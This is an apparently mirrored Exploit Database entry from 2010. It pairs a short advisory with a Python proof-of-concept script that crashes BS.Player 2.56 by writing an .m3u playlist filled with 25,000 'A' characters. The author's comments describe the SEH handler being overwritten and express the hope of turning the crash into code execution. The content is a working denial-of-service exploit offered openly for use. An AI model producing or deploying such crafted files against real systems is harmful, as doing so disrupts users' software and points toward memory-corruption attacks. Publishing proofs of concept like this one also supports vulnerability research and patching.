BS.Player 2.56 – ‘.m3u’ / ‘.pls’ File Processing Multiple Remote Denial of Service Vulnerabilities

• Exploit Database
• 35 阅读

• 作者： modpr0be
  日期： 2010-09-26
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34767/

• # source:https://www.securityfocus.com/bid/43502/info
  #
  # BS.Player is prone to multiple remote denial-of-service vulnerabilities.
  #
  # An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users.
  #
  # BS.Player 2.56 is vulnerable; other versions may also be affected.
  #
  
  #!/usr/bin/python
  #
  # Exploit Title: BS.Player 2.56 (Build 1043) .m3u and .pls Denial of Service
  # Date: September 27, 2010
  # Author: modpr0be
  # Software Link: http://www.bsplayer.com/bsplayer-setup.exe
  # Version: 2.0.0
  # Tested on: Windows XP SP3/2003
  # CVE : -
   
  # How it works?
  # Open BS.Player --> Open the Playlist Window --> Load m3u/pls file --> boom!
  #
  # SEHandler
  # bsplayer.00410041
  #
  # 0012F74C 00410041A.A.Pointer to next SEH record
  # 0012F750 00410041A.A.SE handler
  #
  # I think this is a kind of unicode exploit. I'm learning this, hope it will run calc, soon.
  # btw...thx corelanc0d3r (PVE) for his great exploit writing tutorial ;)
  #
   
  junk = "\x41" * 25000
   
  file = open('blah.m3u','w')# change it if you want to try the .pls
  file.write(junk)
  file.close()